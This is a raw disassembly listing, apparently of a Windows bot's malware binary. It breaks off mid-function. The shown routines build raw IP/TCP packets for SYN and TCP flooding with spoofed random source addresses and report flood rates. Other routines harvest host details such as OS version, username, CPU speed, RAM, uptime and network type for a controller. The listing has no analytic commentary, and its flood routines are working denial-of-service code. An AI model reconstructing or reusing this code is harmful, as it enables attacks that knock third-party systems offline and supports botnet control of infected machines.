var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = word ptr -54h
var_52 = word ptr -52h
var_50 = dword ptr -50h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2E = word ptr -2Eh
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = word ptr -0Eh
var_C = word ptr -0Ch
var_A = word ptr -0Ah
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
lea ebp, [esp-68h]
sub esp, 288h
and [ebp+68h+var_B8], 0
push edi
push 0Eh
pop ecx
xor eax, eax
lea edi, [ebp+68h+var_B7]
rep stosd
stosw
stosb
lea eax, [ebp+68h+var_288]
push eax
push 202h
call dword_435818 ; WSAStartup
test eax, eax
jz short loc_41121C
xor eax, eax
jmp loc_411458
; ---------------------------------------------------------------------------
loc_41121C: ; CODE XREF: sub_4111E2+31�j
push esi
xor edi, edi
inc edi
push edi
xor esi, esi
push esi
push esi
push 0FFh
push 3
push 2
call dword_43578C ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+68h+var_4], eax
jz loc_41144F
push 4
lea ecx, [ebp+68h+var_3C]
push ecx
push 2
push esi
push eax
mov [ebp+68h+var_3C], edi
call dword_435824 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_411446
xor eax, eax
lea edi, [ebp+68h+var_54]
stosd
stosd
stosd
push ebx
push [ebp+68h+arg_8]
stosd
mov [ebp+68h+var_54], 2
call dword_435954 ; htons
mov ebx, [ebp+68h+arg_0]
push 28h
mov [ebp+68h+var_52], ax
mov [ebp+68h+var_50], ebx
mov [ebp+68h+var_30], 45h
call dword_435954 ; htons
push [ebp+68h+arg_8]
mov [ebp+68h+var_2E], ax
mov [ebp+68h+var_2C], 1
mov [ebp+68h+var_2A], si
mov [ebp+68h+var_28], 80h
mov [ebp+68h+var_27], 6
mov [ebp+68h+var_26], si
mov [ebp+68h+var_20], ebx
call dword_435954 ; htons
push 4000h
mov [ebp+68h+var_1A], ax
mov [ebp+68h+var_14], esi
mov [ebp+68h+var_10], 50h
mov [ebp+68h+var_F], 2
call dword_435954 ; htons
mov [ebp+68h+var_E], ax
lea eax, [ebp+68h+var_5C]
push eax
mov [ebp+68h+var_A], si
mov [ebp+68h+var_8], esi
call ds:dword_420030 ; QueryPerformanceFrequency
lea eax, [ebp+68h+var_38]
push eax
call ds:dword_42002C ; QueryPerformanceCounter
push [ebp+68h+var_58]
mov eax, [ebp+68h+arg_C]
push [ebp+68h+var_5C]
cdq
push edx
push eax
call sub_414CC0
add eax, [ebp+68h+var_38]
mov [ebp+68h+var_C], si
adc edx, [ebp+68h+var_34]
mov [ebp+68h+var_44], eax
mov [ebp+68h+var_40], edx
jmp short loc_411339
; ---------------------------------------------------------------------------
loc_41130D: ; CODE XREF: sub_4111E2+22F�j
add [ebp+68h+var_8], eax
lea eax, [ebp+68h+var_38]
push eax
call ds:dword_42002C ; QueryPerformanceCounter
mov eax, [ebp+68h+var_34]
cmp eax, [ebp+68h+var_40]
jg loc_411442
jl short loc_411334
mov eax, [ebp+68h+var_38]
cmp eax, [ebp+68h+var_44]
jnb loc_411442
loc_411334: ; CODE XREF: sub_4111E2+144�j
and [ebp+68h+var_C], 0
loc_411339: ; CODE XREF: sub_4111E2+129�j
call sub_4145D1
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call dword_435954 ; htons
mov [ebp+68h+var_1C], ax
call sub_4145D1
call sub_4145D1
push eax
call dword_435954 ; htons
push [ebp+68h+arg_4]
movzx eax, ax
mov [ebp+68h+var_18], eax
call dword_43592C ; htonl
inc [ebp+68h+arg_4]
and [ebp+68h+var_74], 0
mov esi, eax
push 14h
mov [ebp+68h+var_24], esi
mov [ebp+68h+var_78], ebx
mov [ebp+68h+var_73], 6
call dword_435954 ; htons
push 8
pop ecx
mov [ebp+68h+var_7C], esi
mov [ebp+68h+var_72], ax
push 5
lea esi, [ebp+68h+var_7C]
lea edi, [ebp+68h+var_B8]
rep movsd
pop ecx
lea eax, [ebp+68h+var_B8]
push 34h
lea esi, [ebp+68h+var_1C]
lea edi, [ebp+68h+var_98]
push eax
rep movsd
call sub_407D6B
push 5
pop ecx
push 5
lea esi, [ebp+68h+var_30]
lea edi, [ebp+68h+var_B8]
rep movsd
mov [ebp+68h+var_C], ax
pop ecx
lea esi, [ebp+68h+var_1C]
lea edi, [ebp+68h+var_A4]
rep movsd
xor eax, eax
lea edi, [ebp+68h+var_90]
stosd
lea eax, [ebp+68h+var_B8]
push 28h
push eax
call sub_407D6B
add esp, 10h
push 5
pop ecx
push 10h
mov [ebp+68h+var_26], ax
lea eax, [ebp+68h+var_54]
push eax
push 0
push 28h
lea eax, [ebp+68h+var_B8]
push eax
push [ebp+68h+var_4]
lea esi, [ebp+68h+var_30]
lea edi, [ebp+68h+var_B8]
rep movsd
call dword_4357D8 ; sendto
cmp eax, 0FFFFFFFFh
jnz loc_41130D
call dword_4358C0 ; WSAGetLastError
push eax
lea eax, [ebp+68h+var_F8]
push offset aSynSendErrorD_ ; "[SYN]: Send error: <%d>."
push eax
call sub_414415
lea eax, [ebp+68h+var_F8]
push eax
call sub_401EFF
add esp, 10h
xor esi, esi
jmp short loc_411445
; ---------------------------------------------------------------------------
loc_411442: ; CODE XREF: sub_4111E2+13E�j
; sub_4111E2+14C�j
mov esi, [ebp+68h+var_8]
loc_411445: ; CODE XREF: sub_4111E2+25E�j
pop ebx
loc_411446: ; CODE XREF: sub_4111E2+74�j
push [ebp+68h+var_4]
call dword_435914 ; closesocket
loc_41144F: ; CODE XREF: sub_4111E2+58�j
call dword_435920 ; WSACleanup
mov eax, esi
pop esi
loc_411458: ; CODE XREF: sub_4111E2+35�j
pop edi
add ebp, 68h
leave
retn
sub_4111E2 endp
; =============== S U B R O U T I N E =======================================
sub_41145E proc near ; CODE XREF: sub_4114B6+3C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_407BFF
push [esp+10h+arg_4]
mov esi, eax
call sub_4147A2
push [esp+14h+arg_8]
mov ebx, eax
call sub_4147A2
mov edi, eax
call sub_4145D1
cdq
mov ecx, 200h
idiv ecx
push edi
push ebx
lea eax, [edx+esi+100h]
push eax
push esi
call sub_4111E2
add esp, 1Ch
test eax, eax
jnz short loc_4114A7
inc eax
loc_4114A7: ; CODE XREF: sub_41145E+46�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_41145E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4114B6 proc near ; DATA XREF: sub_4089DC+29E7�o
var_414 = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_190 = byte ptr -190h
var_110 = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov esi, eax
mov ecx, 85h
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_190]
push eax
lea eax, [ebp+var_210]
push eax
call sub_41145E
push eax
lea eax, [ebp+var_414]
push offset aSynDoneWithFlo ; "[SYN]: Done with flood (%iKB/sec)."
push eax
call sub_414415
xor esi, esi
add esp, 18h
cmp [ebp+var_8], esi
jnz short loc_411533
push esi
push [ebp+var_C]
lea eax, [ebp+var_414]
push eax
lea eax, [ebp+var_90]
push eax
push [ebp+var_214]
call sub_4056BF
add esp, 14h
loc_411533: ; CODE XREF: sub_4114B6+5B�j
lea eax, [ebp+var_414]
push eax
call sub_401EFF
push [ebp+var_10]
call sub_41255E
pop ecx
pop ecx
push esi
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_4114B6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_411551 proc near ; CODE XREF: sub_401000+74�p
; sub_4089DC+46ED�p ...
arg_0 = dword ptr 4
push esi
push edi
call ds:dword_420004 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
xor edx, edx
mov ecx, 15180h
mov esi, 0E10h
push 3Ch
pop edi
sub eax, [esp+8+arg_0]
div ecx
mov ecx, eax
mov eax, edx
xor edx, edx
div esi
mov esi, eax
mov eax, edx
xor edx, edx
div edi
push eax
push esi
push ecx
push offset aDdDhDm ; "%dd %dh %dm"
push 32h
mov esi, offset dword_47C184
push esi
call sub_41466D
add esp, 18h
pop edi
mov eax, esi
pop esi
retn
sub_411551 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_4115A4 proc near ; CODE XREF: sub_40378E+24�p
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_84 = dword ptr -84h
push ebp
lea ebp, [esp-78h]
sub esp, 94h
push esi
lea eax, [ebp+78h+var_94]
push eax
xor esi, esi
mov [ebp+78h+var_94], 94h
call ds:dword_420120 ; GetVersionExA
test eax, eax
jz short loc_411614
cmp [ebp+78h+var_90], 4
jnz short loc_4115F6
cmp [ebp+78h+var_8C], esi
jnz short loc_4115E4
cmp [ebp+78h+var_84], 1
jnz short loc_4115D9
inc esi
loc_4115D9: ; CODE XREF: sub_4115A4+32�j
cmp [ebp+78h+var_84], 2
jnz short loc_411614
xor esi, esi
inc esi
jmp short loc_411614
; ---------------------------------------------------------------------------
loc_4115E4: ; CODE XREF: sub_4115A4+2C�j
cmp [ebp+78h+var_8C], 0Ah
jnz short loc_4115EE
loc_4115EA: ; CODE XREF: sub_4115A4+5B�j
push 2
jmp short loc_411613
; ---------------------------------------------------------------------------
loc_4115EE: ; CODE XREF: sub_4115A4+44�j
cmp [ebp+78h+var_8C], 5Ah
jnz short loc_411614
jmp short loc_411607
; ---------------------------------------------------------------------------
loc_4115F6: ; CODE XREF: sub_4115A4+27�j
cmp [ebp+78h+var_90], 5
jnz short loc_411614
cmp [ebp+78h+var_8C], esi
jz short loc_4115EA
cmp [ebp+78h+var_8C], 1
jnz short loc_41160B
loc_411607: ; CODE XREF: sub_4115A4+50�j
push 3
jmp short loc_411613
; ---------------------------------------------------------------------------
loc_41160B: ; CODE XREF: sub_4115A4+61�j
cmp [ebp+78h+var_8C], 2
jnz short loc_411614
push 7
loc_411613: ; CODE XREF: sub_4115A4+48�j
; sub_4115A4+65�j
pop esi
loc_411614: ; CODE XREF: sub_4115A4+21�j
; sub_4115A4+39�j ...
mov eax, esi
pop esi
add ebp, 78h
leave
retn
sub_4115A4 endp
; =============== S U B R O U T I N E =======================================
sub_41161C proc near ; CODE XREF: sub_4116D2+240�p
push ebx
push esi
push edi
mov edi, 0F4240h
loc_411624: ; CODE XREF: sub_41161C+2F�j
; sub_41161C+35�j
rdtsc
push 3E8h
mov ebx, edx
mov esi, eax
call ds:dword_420000 ; Sleep
rdtsc
push 0
sub eax, esi
push edi
sbb edx, ebx
push edx
push eax
call sub_415F90
mov esi, edx
test esi, esi
mov ebx, eax
ja short loc_411624
jb short loc_411653
cmp ebx, edi
ja short loc_411624
loc_411653: ; CODE XREF: sub_41161C+31�j
push 0
push 64h
push esi
push ebx
call sub_415F10
mov ecx, edx
push 64h
xor edx, edx
test ecx, ecx
mov edi, eax
pop eax
ja short loc_4116C6
jb short loc_411672
cmp edi, 50h
jnb short loc_411677
loc_411672: ; CODE XREF: sub_41161C+4F�j
push 4Bh
pop eax
xor edx, edx
loc_411677: ; CODE XREF: sub_41161C+54�j
test ecx, ecx
ja short loc_4116C6
jb short loc_411682
cmp edi, 47h
jnb short loc_411687
loc_411682: ; CODE XREF: sub_41161C+5F�j
push 42h
pop eax
xor edx, edx
loc_411687: ; CODE XREF: sub_41161C+64�j
test ecx, ecx
ja short loc_4116C6
jb short loc_411692
cmp edi, 37h
jnb short loc_411697
loc_411692: ; CODE XREF: sub_41161C+6F�j
push 32h
pop eax
xor edx, edx
loc_411697: ; CODE XREF: sub_41161C+74�j
test ecx, ecx
ja short loc_4116C6
jb short loc_4116A2
cmp edi, 26h
jnb short loc_4116A7
loc_4116A2: ; CODE XREF: sub_41161C+7F�j
push 21h
pop eax
xor edx, edx
loc_4116A7: ; CODE XREF: sub_41161C+84�j
test ecx, ecx
ja short loc_4116C6
jb short loc_4116B2
cmp edi, 1Eh
jnb short loc_4116B7
loc_4116B2: ; CODE XREF: sub_41161C+8F�j
push 19h
pop eax
xor edx, edx
loc_4116B7: ; CODE XREF: sub_41161C+94�j
test ecx, ecx
ja short loc_4116C6
jb short loc_4116C2
cmp edi, 0Ah
jnb short loc_4116C6
loc_4116C2: ; CODE XREF: sub_41161C+9F�j
xor eax, eax
xor edx, edx
loc_4116C6: ; CODE XREF: sub_41161C+4D�j
; sub_41161C+5D�j ...
sub eax, edi
sbb edx, ecx
add eax, ebx
pop edi
adc edx, esi
pop esi
pop ebx
retn
sub_41161C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=70h
sub_4116D2 proc near ; CODE XREF: sub_4089DC+48E4�p
var_7E8 = byte ptr -7E8h
var_668 = byte ptr -668h
var_5E8 = byte ptr -5E8h
var_568 = byte ptr -568h
var_4E8 = byte ptr -4E8h
var_3E4 = byte ptr -3E4h
var_2E8 = byte ptr -2E8h
var_25C = word ptr -25Ch
var_25A = byte ptr -25Ah
var_15C = byte ptr -15Ch
var_114 = byte ptr -114h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
var_38 = byte ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
lea ebp, [esp-70h]
sub esp, 7E8h
push ebx
push esi
push edi
lea eax, [ebp+70h+var_CC]
push eax
mov [ebp+70h+var_4], 420AEAh
mov [ebp+70h+var_CC], 94h
call ds:dword_420120 ; GetVersionExA
xor ebx, ebx
cmp [ebp+70h+var_C8], 4
jnz short loc_411743
cmp [ebp+70h+var_C4], ebx
jnz short loc_411725
cmp [ebp+70h+var_BC], 1
jnz short loc_411712
mov [ebp+70h+var_4], offset a95 ; "95"
loc_411712: ; CODE XREF: sub_4116D2+37�j
cmp [ebp+70h+var_BC], 2
jnz loc_4117A9
mov [ebp+70h+var_4], offset aNt ; "NT"
jmp short loc_411780
; ---------------------------------------------------------------------------
loc_411725: ; CODE XREF: sub_4116D2+31�j
cmp [ebp+70h+var_C4], 0Ah
jnz short loc_411734
mov [ebp+70h+var_4], offset a98 ; "98"
jmp short loc_41177A
; ---------------------------------------------------------------------------
loc_411734: ; CODE XREF: sub_4116D2+57�j
cmp [ebp+70h+var_C4], 5Ah
jnz short loc_411773
mov [ebp+70h+var_4], offset aMe_0 ; "ME"
jmp short loc_41177A
; ---------------------------------------------------------------------------
loc_411743: ; CODE XREF: sub_4116D2+2C�j
cmp [ebp+70h+var_C8], 5
jnz short loc_411773
cmp [ebp+70h+var_C4], ebx
jnz short loc_411757
mov [ebp+70h+var_4], offset a2k ; "2K"
jmp short loc_41177A
; ---------------------------------------------------------------------------
loc_411757: ; CODE XREF: sub_4116D2+7A�j
cmp [ebp+70h+var_C4], 1
jnz short loc_411766
mov [ebp+70h+var_4], offset aXp_0 ; "XP"
jmp short loc_41177A
; ---------------------------------------------------------------------------
loc_411766: ; CODE XREF: sub_4116D2+89�j
cmp [ebp+70h+var_C4], 2
mov [ebp+70h+var_4], offset a2003 ; "2003"
jz short loc_41177A
loc_411773: ; CODE XREF: sub_4116D2+66�j
; sub_4116D2+75�j
mov [ebp+70h+var_4], offset a??? ; "???"
loc_41177A: ; CODE XREF: sub_4116D2+60�j
; sub_4116D2+6F�j ...
cmp [ebp+70h+var_BC], 2
jnz short loc_4117A9
loc_411780: ; CODE XREF: sub_4116D2+51�j
cmp [ebp+70h+var_B8], bl
jz short loc_4117A9
lea eax, [ebp+70h+var_B8]
push eax
push [ebp+70h+var_4]
lea eax, [ebp+70h+var_2E8]
push offset aSS_5 ; "%s (%s)"
push eax
call sub_414415
lea eax, [ebp+70h+var_2E8]
add esp, 10h
mov [ebp+70h+var_4], eax
loc_4117A9: ; CODE XREF: sub_4116D2+44�j
; sub_4116D2+AC�j ...
push 3Fh
pop ecx
xor eax, eax
mov [ebp+70h+var_25C], cx
lea edi, [ebp+70h+var_25A]
rep stosd
stosw
mov eax, dword_435898
cmp eax, ebx
mov [ebp+70h+var_C], 100h
jz short loc_4117DC
lea ecx, [ebp+70h+var_C]
push ecx
lea ecx, [ebp+70h+var_25C]
push ecx
call eax ; GetUserNameA
loc_4117DC: ; CODE XREF: sub_4116D2+FB�j
push [ebp+70h+arg_4]
call sub_407D15
pop ecx
push eax
call dword_43587C ; inet_addr
push 2
mov [ebp+70h+var_8], eax
push 4
lea eax, [ebp+70h+var_8]
push eax
call dword_4358F8 ; gethostbyaddr
cmp eax, ebx
jz short loc_411805
push dword ptr [eax]
jmp short loc_41180A
; ---------------------------------------------------------------------------
loc_411805: ; CODE XREF: sub_4116D2+12D�j
push offset aCouldnTResolve ; "couldn't resolve host"
loc_41180A: ; CODE XREF: sub_4116D2+131�j
lea eax, [ebp+70h+var_3E4]
push eax
call sub_414415
pop ecx
pop ecx
push 104h
lea eax, [ebp+70h+var_4E8]
push eax
call ds:dword_420048 ; GetSystemDirectoryA
push 46h
lea eax, [ebp+70h+var_114]
push eax
push offset aDdMmmYyyy ; "dd:MMM:yyyy"
push ebx
push ebx
mov esi, 409h
push esi
call ds:dword_42009C ; GetDateFormatA
push 46h
lea eax, [ebp+70h+var_15C]
push eax
push offset aHhMmSs ; "HH:mm:ss"
push ebx
push ebx
push esi
call ds:dword_420098 ; GetTimeFormatA
push 8
pop ecx
xor eax, eax
lea edi, [ebp+70h+var_38]
rep stosd
lea eax, [ebp+70h+var_38]
push eax
call ds:dword_420130 ; GlobalMemoryStatus
push ebx
push ebx
push ebx
lea eax, [ebp+70h+var_18]
push eax
lea eax, [ebp+70h+var_4E8]
push eax
call sub_415B3D
lea eax, [ebp+70h+var_18]
push eax
lea eax, [ebp+70h+var_7E8]
push eax
call sub_402C05
push 60h
pop ecx
mov esi, eax
lea edi, [ebp+70h+var_668]
push ebx
rep movsd
call sub_411551
add esp, 20h
push eax
lea eax, [ebp+70h+var_15C]
push eax
lea eax, [ebp+70h+var_114]
push eax
lea eax, [ebp+70h+var_25C]
push eax
push [ebp+70h+arg_4]
call sub_407D15
pop ecx
push eax
lea eax, [ebp+70h+var_3E4]
push eax
lea eax, [ebp+70h+var_4E8]
push eax
push [ebp+70h+var_C0]
lea eax, [ebp+70h+var_5E8]
push [ebp+70h+var_C4]
push [ebp+70h+var_C8]
push [ebp+70h+var_4]
push eax
lea eax, [ebp+70h+var_568]
push eax
mov eax, [ebp+70h+var_2C]
shr eax, 0Ah
push ebx
push eax
call sub_402B01
pop ecx
pop ecx
push eax
mov eax, [ebp+70h+var_30]
shr eax, 0Ah
push ebx
push eax
call sub_402B01
pop ecx
pop ecx
push eax
call sub_41161C
push edx
push eax
push offset aSysinfoCpuI64u ; "[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB"...
push 200h
push [ebp+70h+arg_0]
call sub_41466D
mov eax, [ebp+70h+arg_0]
add esp, 50h
pop edi
pop esi
pop ebx
add ebp, 70h
leave
retn
sub_4116D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=6Ch
sub_411939 proc near ; CODE XREF: sub_4089DC+3745�p
; sub_4089DC+4913�p
var_8C = byte ptr -8Ch
var_C = byte ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
lea ebp, [esp-6Ch]
sub esp, 8Ch
push edi
push 20h
pop ecx
xor eax, eax
cmp dword_435980, eax
lea edi, [ebp+6Ch+var_8C]
rep stosd
pop edi
jnz short loc_41199F
push eax
push 80h
lea eax, [ebp+6Ch+var_8C]
push eax
lea eax, [ebp+6Ch+var_C]
push eax
call dword_435950 ; InternetGetConnectedStateEx
test eax, eax
jnz short loc_411980
lea eax, [ebp+6Ch+var_8C]
push offset dword_42873C
push eax
call sub_414415
pop ecx
pop ecx
loc_411980: ; CODE XREF: sub_411939+35�j
test [ebp+6Ch+var_C], 1
lea eax, [ebp+6Ch+var_8]
jz short loc_411998
push offset dword_428734
loc_41198E: ; CODE XREF: sub_411939+64�j
push eax
call sub_414415
pop ecx
pop ecx
jmp short loc_4119BD
; ---------------------------------------------------------------------------
loc_411998: ; CODE XREF: sub_411939+4E�j
push offset dword_428730
jmp short loc_41198E
; ---------------------------------------------------------------------------
loc_41199F: ; CODE XREF: sub_411939+1D�j
push esi
mov esi, offset off_42872C
lea eax, [ebp+6Ch+var_8]
push esi
push eax
call sub_414415
lea eax, [ebp+6Ch+var_8C]
push esi
push eax
call sub_414415
add esp, 10h
pop esi
loc_4119BD: ; CODE XREF: sub_411939+5D�j
push [ebp+6Ch+arg_4]
push [ebp+6Ch+arg_8]
call sub_407D15
pop ecx
push eax
lea eax, [ebp+6Ch+var_8C]
push eax
lea eax, [ebp+6Ch+var_8]
push eax
push offset aNetinfoTypeSS_ ; "[NETINFO]: [Type]: %s (%s). [IP Address"...
push 200h
push [ebp+6Ch+arg_0]
call sub_41466D
mov eax, [ebp+6Ch+arg_0]
add esp, 1Ch
add ebp, 6Ch
leave
retn
sub_411939 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame fpd=74h
sub_4119EF proc near ; DATA XREF: sub_4089DC+5360�o
var_440 = byte ptr -440h
var_240 = dword ptr -240h
var_23C = byte ptr -23Ch
var_1BC = byte ptr -1BCh
var_13C = byte ptr -13Ch
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A0 = byte ptr -0A0h
var_9F = byte ptr -9Fh
var_8C = byte ptr -8Ch
var_80 = byte ptr -80h
var_78 = byte ptr -78h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_5B = byte ptr -5Bh
var_5A = word ptr -5Ah
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2E = word ptr -2Eh
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 440h
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 68h
mov esi, eax
pop ecx
lea edi, [ebp+74h+var_240]
rep movsd
mov esi, ds:dword_420004
mov dword ptr [eax+19Ch], 1
push 0Eh
xor eax, eax
xor ebx, ebx
mov [ebp+74h+var_A0], bl
pop ecx
lea edi, [ebp+74h+var_9F]
rep stosd
stosw
stosb
call esi ; GetTickCount
push eax
call sub_4145C4
pop ecx
push 0FFh
push 3
push 2
call dword_435808 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+74h+var_4], eax
jnz short loc_411A78
call dword_4358C0 ; WSAGetLastError
push eax
push offset aTcpErrorSocket ; "[TCP]: Error: socket() failed, returned"...
loc_411A5B: ; CODE XREF: sub_4119EF+B1�j
lea eax, [ebp+74h+var_440]
push eax
call sub_414415
add esp, 0Ch
loc_411A6A: ; CODE XREF: sub_4119EF+D8�j
; sub_4119EF+3DE�j
cmp [ebp+74h+var_A8], ebx
jnz loc_411D7D
jmp loc_411D5D
; ---------------------------------------------------------------------------
loc_411A78: ; CODE XREF: sub_4119EF+5E�j
push 4
lea ecx, [ebp+74h+var_34]
push ecx
push 2
push ebx
push eax
mov [ebp+74h+var_34], 1
call dword_435824 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_411AA2
call dword_4358C0 ; WSAGetLastError
push eax
push offset aTcpErrorSetsoc ; "[TCP]: Error: setsockopt() failed, retu"...
jmp short loc_411A5B
; ---------------------------------------------------------------------------
loc_411AA2: ; CODE XREF: sub_4119EF+A3�j
lea eax, [ebp+74h+var_23C]
push eax
call dword_43587C ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_411AC9
lea eax, [ebp+74h+var_440]
push offset aTcpInvalidTarg ; "[TCP]: Invalid target IP."
push eax
call sub_414415
pop ecx
pop ecx
jmp short loc_411A6A
; ---------------------------------------------------------------------------
loc_411AC9: ; CODE XREF: sub_4119EF+C3�j
xor eax, eax
lea edi, [ebp+74h+var_44]
stosd
stosd
stosd
stosd
push ebx
mov [ebp+74h+var_44], 2
call dword_435954 ; htons
mov [ebp+74h+var_42], ax
lea eax, [ebp+74h+var_23C]
push eax
call dword_43587C ; inet_addr
mov [ebp+74h+var_40], eax
mov [ebp+74h+arg_0], ebx
call esi ; GetTickCount
mov [ebp+74h+var_1C], eax
call esi ; GetTickCount
sub eax, [ebp+74h+var_1C]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+74h+var_B4]
ja loc_411D15
mov [ebp+74h+var_30], 45h
mov [ebp+74h+var_2C], 1
mov [ebp+74h+var_2A], bx
mov [ebp+74h+var_28], 80h
mov [ebp+74h+var_27], 6
mov [ebp+74h+var_C], 50h
mov [ebp+74h+var_6], bx
loc_411B30: ; CODE XREF: sub_4119EF+320�j
push 28h
call dword_435954 ; htons
cmp [ebp+74h+var_B0], ebx
mov [ebp+74h+var_2E], ax
mov [ebp+74h+var_26], bx
jz short loc_411B6C
call sub_4145D1
mov esi, eax
shl esi, 8
call sub_4145D1
add esi, eax
shl esi, 8
call sub_4145D1
add esi, eax
shl esi, 8
call sub_4145D1
add esi, eax
jmp short loc_411B81
; ---------------------------------------------------------------------------
loc_411B6C: ; CODE XREF: sub_4119EF+154�j
push [ebp+74h+var_240]
call sub_407D15
pop ecx
push eax
call dword_43587C ; inet_addr
mov esi, eax
loc_411B81: ; CODE XREF: sub_4119EF+17B�j
cmp [ebp+74h+var_B8], ebx
mov edi, [ebp+74h+var_40]
mov [ebp+74h+var_24], esi
mov [ebp+74h+var_20], edi
jnz short loc_411B9F
call sub_4145D1
cdq
mov ecx, 401h
idiv ecx
push edx
jmp short loc_411BA2
; ---------------------------------------------------------------------------
loc_411B9F: ; CODE XREF: sub_4119EF+19E�j
push [ebp+74h+var_B8]
loc_411BA2: ; CODE XREF: sub_4119EF+1AE�j
call dword_435954 ; htons
mov [ebp+74h+var_16], ax
call sub_4145D1
cdq
mov ecx, 401h
idiv ecx
push edx
call dword_435954 ; htons
push 12345678h
mov [ebp+74h+var_18], ax
call dword_43592C ; htonl
mov [ebp+74h+var_14], eax
lea eax, [ebp+74h+var_1BC]
push offset aSyn ; "syn"
push eax
call sub_414EE0
test eax, eax
pop ecx
pop ecx
jz short loc_411BF2
mov [ebp+74h+var_10], ebx
mov [ebp+74h+var_B], 2
jmp short loc_411C4E
; ---------------------------------------------------------------------------
loc_411BF2: ; CODE XREF: sub_4119EF+1F8�j
lea eax, [ebp+74h+var_1BC]
push offset aAck ; "ack"
push eax
call sub_414EE0
test eax, eax
pop ecx
pop ecx
jz short loc_411C12
mov [ebp+74h+var_10], ebx
mov [ebp+74h+var_B], 10h
jmp short loc_411C4E
; ---------------------------------------------------------------------------
loc_411C12: ; CODE XREF: sub_4119EF+218�j
lea eax, [ebp+74h+var_1BC]
push offset aRandom_0 ; "random"
push eax
call sub_414EE0
test eax, eax
pop ecx
pop ecx
jz short loc_411C4E
call sub_4145D1
cdq
push 3
pop ecx
idiv ecx
mov [ebp+74h+var_10], edx
call sub_4145D1
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+74h+var_B], dl
loc_411C4E: ; CODE XREF: sub_4119EF+201�j
; sub_4119EF+221�j ...
push 200h
call dword_435954 ; htons
push 14h
mov [ebp+74h+var_A], ax
mov [ebp+74h+var_8], bx
mov [ebp+74h+var_64], esi
mov [ebp+74h+var_60], edi
mov [ebp+74h+var_5C], bl
mov [ebp+74h+var_5B], 6
call dword_435954 ; htons
push 8
pop ecx
mov [ebp+74h+var_5A], ax
push 5
lea esi, [ebp+74h+var_64]
lea edi, [ebp+74h+var_A0]
rep movsd
pop ecx
lea eax, [ebp+74h+var_A0]
push 34h
lea esi, [ebp+74h+var_18]
lea edi, [ebp+74h+var_80]
push eax
rep movsd
call sub_407D6B
push 5
pop ecx
push 5
